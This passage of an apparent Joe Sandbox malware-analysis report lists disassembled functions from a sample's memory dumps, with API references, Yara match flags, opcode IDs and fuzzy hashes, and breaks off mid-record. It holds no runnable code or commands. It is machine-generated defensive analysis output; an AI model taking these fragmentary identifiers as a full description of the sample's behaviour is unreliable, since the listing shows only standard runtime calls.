                                                                      • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                      APIs
                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024BC170
                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024BC180
                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024BC190
                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 024BC1A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Compare_exchange_acquire_4std::_
                                                                      • String ID:
                                                                      • API String ID: 3973403980-0
                                                                      • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                      • Instruction ID: c25cf8382e5d33e1bc41851430a8bec3823c6e0856d03d6e102edd94d0624df2
                                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                      • Instruction Fuzzy Hash: 7501A47A404149AFDF139E94DCC18EE3B66AF26250F048517F92898160D732C6B2AEA1
                                                                      APIs
                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Compare_exchange_acquire_4std::_
                                                                      • String ID:
                                                                      • API String ID: 3973403980-0
                                                                      • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                      • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                      • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                      APIs
                                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 024B378C
                                                                        • Part of subcall function 024B2B16: ___crtGetTimeFormatEx.LIBCMT ref: 024B2B2C
                                                                        • Part of subcall function 024B2B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 024B2B4B
                                                                      • GetLastError.KERNEL32 ref: 024B37A8
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B37BE
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B37CC
                                                                        • Part of subcall function 024B28EC: SetThreadPriority.KERNEL32(?,?), ref: 024B28F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                      • String ID:
                                                                      • API String ID: 1674182817-0
                                                                      • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                      • Instruction ID: e50b26587e9641a57ddd5e9943f368b74916581611cf6304207fef1205550856
                                                                      • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                      • Instruction Fuzzy Hash: 9FF027B2A002153AD721FB774C06FFB3A9C9F00741F50096FB800E2580FED8D4008AB4
                                                                      APIs
                                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024B1342
                                                                        • Part of subcall function 024B0BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024B0BD6
                                                                        • Part of subcall function 024B0BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 024B0BF7
                                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024B1355
                                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024B1361
                                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024B136A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                      • String ID:
                                                                      • API String ID: 4284812201-0
                                                                      • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                      • Instruction ID: 095e2401f94d70ff0ee872cc53f753574b048cd83cea2197cacef3fbdfac6a75
                                                                      • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                      • Instruction Fuzzy Hash: 56F0B431704704A7AF167EBA08205FF32975F51314B04516FE51AAF3C0EEB59D419BB4
                                                                      APIs
                                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB
                                                                        • Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
                                                                        • Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990
                                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
                                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
                                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                      • String ID:
                                                                      • API String ID: 4284812201-0
                                                                      • Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                      • Instruction ID: 3d6a6adf541079fe7b6c6bfd004b769b4972a14d6898e3ab699feac8cff21146
                                                                      • Opcode Fuzzy Hash: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
                                                                      • Instruction Fuzzy Hash: 61F02B31B00204A7DF24BBA644526FE36564F44318F04413FBA12EB3D1DEBC9DC1925D
                                                                      APIs
                                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413525
                                                                        • Part of subcall function 004128AF: ___crtGetTimeFormatEx.LIBCMT ref: 004128C5
                                                                        • Part of subcall function 004128AF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128E4
                                                                      • GetLastError.KERNEL32 ref: 00413541
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413557
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00413565
                                                                        • Part of subcall function 00412685: SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                      • String ID:
                                                                      • API String ID: 1674182817-0
                                                                      • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                      • Instruction ID: 4f5043be301f020a87894878a43913a51c3f7b1e9493329acf7807e64a758140
                                                                      • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                      • Instruction Fuzzy Hash: 69F0E2B1A002253AE724B6765D07FFB369C9B00B54F50091BB905E60C2EDDCE58042AC
                                                                      APIs
                                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 024BD088
                                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 024BD0AC
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024BD0BF
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024BD0CD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                      • String ID:
                                                                      • API String ID: 3657713681-0
                                                                      • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                      • Instruction ID: c2aaed860c7d21b57304914db772e0df876c0bc76565e2076d1b31c0223ad55b
                                                                      • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                      • Instruction Fuzzy Hash: 6CF05935E00604E3C326FA16D840CDFB37A8E90B1836085AFD80517285DB31A90BCE71
                                                                      APIs
                                                                      • std::_Cnd_initX.LIBCPMT ref: 024A5A83
                                                                      • __Cnd_signal.LIBCPMT ref: 024A5A8F
                                                                      • std::_Cnd_initX.LIBCPMT ref: 024A5AA4
                                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 024A5AAB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                      • String ID:
                                                                      • API String ID: 2059591211-0
                                                                      • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                      • Instruction ID: c973927cb99b8fc2ffbd03d401da7c06823b6166904e42d84b39928114e5b3d4
                                                                      • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                      • Instruction Fuzzy Hash: 9BF0EC71500700DFEB217B73D82571A73B2AF10729F54441FE15A56D90CFB6E8145F55
                                                                      APIs
                                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 024B286F
                                                                      • GetLastError.KERNEL32(?,?,?,?,024B8830,?,?,?,?,00000000,?,00000000), ref: 024B287E
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B2894
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B28A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                      • String ID:
                                                                      • API String ID: 3803302727-0
                                                                      • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                      • Instruction ID: 9967320d5db67f8b7ae01e92bd3803c3fde72d9a8c0f00bfa163821ec9d11ef9
                                                                      • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                      • Instruction Fuzzy Hash: 4EF0A03450010ABBCF01EFA5CD44EEF37B86F00701F200616B910E20A0DB74D6049B74
                                                                      APIs
                                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                      • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                      • String ID:
                                                                      • API String ID: 3803302727-0
                                                                      • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                      • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                      • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                      • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                      APIs
                                                                      • ___crtCreateEventExW.LIBCPMT ref: 024B2593
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,024B0DA0), ref: 024B25A1
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B25B7
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B25C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                      • String ID:
                                                                      • API String ID: 200240550-0
                                                                      • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                      • Instruction ID: 4628d8b34eb806b9520fbe780927e99b9b5d0a2c739c15815fb2164cc219af73
                                                                      • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                      • Instruction Fuzzy Hash: 0CE0D86160021939E711F7764C16FBB369C9F10B41F54086ABD14E11C1FAD4D10049B5
                                                                      APIs
                                                                      • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                      • String ID:
                                                                      • API String ID: 200240550-0
                                                                      • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                      • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                      • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                      • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                      APIs
                                                                        • Part of subcall function 024B2959: TlsAlloc.KERNEL32(?,024B0DA0), ref: 024B295F
                                                                      • TlsAlloc.KERNEL32(?,024B0DA0), ref: 024C3BE6
                                                                      • GetLastError.KERNEL32 ref: 024C3BF8
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024C3C0E
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024C3C1C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                      • String ID:
                                                                      • API String ID: 3735082963-0
                                                                      • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                      • Instruction ID: 72a6fef3d4d46ed66b2ad8c781c0e314e06e5dba782d2686abd27af070c0eada
                                                                      • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                      • Instruction Fuzzy Hash: 04E0223C500202ABC300BF7B9C49ABF3A686A003417204A6FE529D21A1FA34D0068E78
                                                                      APIs
                                                                        • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                      • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                      • GetLastError.KERNEL32 ref: 00423991
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                      • String ID:
                                                                      • API String ID: 3735082963-0
                                                                      • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                      • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                      • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                      • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                      APIs
                                                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024B0DA0), ref: 024B279E
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,024B0DA0), ref: 024B27AD
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B27C3
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B27D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                      • String ID:
                                                                      • API String ID: 3016159387-0
                                                                      • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                      • Instruction ID: 4364c471dd96eee7190f0fc8c0ed753d377b899bef2f532c57a16c0e14197e52
                                                                      • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                      • Instruction Fuzzy Hash: 7DE08078500109A7C701FBB6DD49EEF73BC6E00B05B600566B501E3550EB64D7048B79
                                                                      APIs
                                                                      • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                      • String ID:
                                                                      • API String ID: 3016159387-0
                                                                      • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                      • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                      • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                      • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                      APIs
                                                                      • SetThreadPriority.KERNEL32(?,?), ref: 024B28F8
                                                                      • GetLastError.KERNEL32 ref: 024B2904
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B291A
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B2928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                      • String ID:
                                                                      • API String ID: 4286982218-0
                                                                      • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                      • Instruction ID: 5d79487b336199347a8ce31bdac139994098b59f72d813aa7430faa8cb0d6e7b
                                                                      • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                      • Instruction Fuzzy Hash: A1E0863460010977CB15FF76CC05BFB376C6F04745B50092ABC19D20A0EB75D1148AB8
                                                                      APIs
                                                                      • TlsSetValue.KERNEL32(?,00000000,024B7BD8,00000000,?,?,024B0DA0,?,?,?,00000000,?,00000000), ref: 024B29BE
                                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024B29CA
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B29E0
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B29EE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                      • String ID:
                                                                      • API String ID: 1964976909-0
                                                                      • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                      • Instruction ID: 6fbfe7038acc54937837cc3c72b1e6511ff6c41af0898bb68a79bede44b8dbd6
                                                                      • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                      • Instruction Fuzzy Hash: F9E04F342001096ADB11EF668C08BFB36686F00745B50092AB919D10A0EB75D1149AB8
                                                                      APIs
                                                                      • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                      • GetLastError.KERNEL32 ref: 0041269D
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                      • String ID:
                                                                      • API String ID: 4286982218-0
                                                                      • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                      • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                      • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                      • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                      APIs
                                                                      • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                      • String ID:
                                                                      • API String ID: 1964976909-0
                                                                      • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                      • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                      • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                      • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                      APIs
                                                                      • TlsAlloc.KERNEL32(?,024B0DA0), ref: 024B295F
                                                                      • GetLastError.KERNEL32 ref: 024B296C
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B2982
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B2990
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
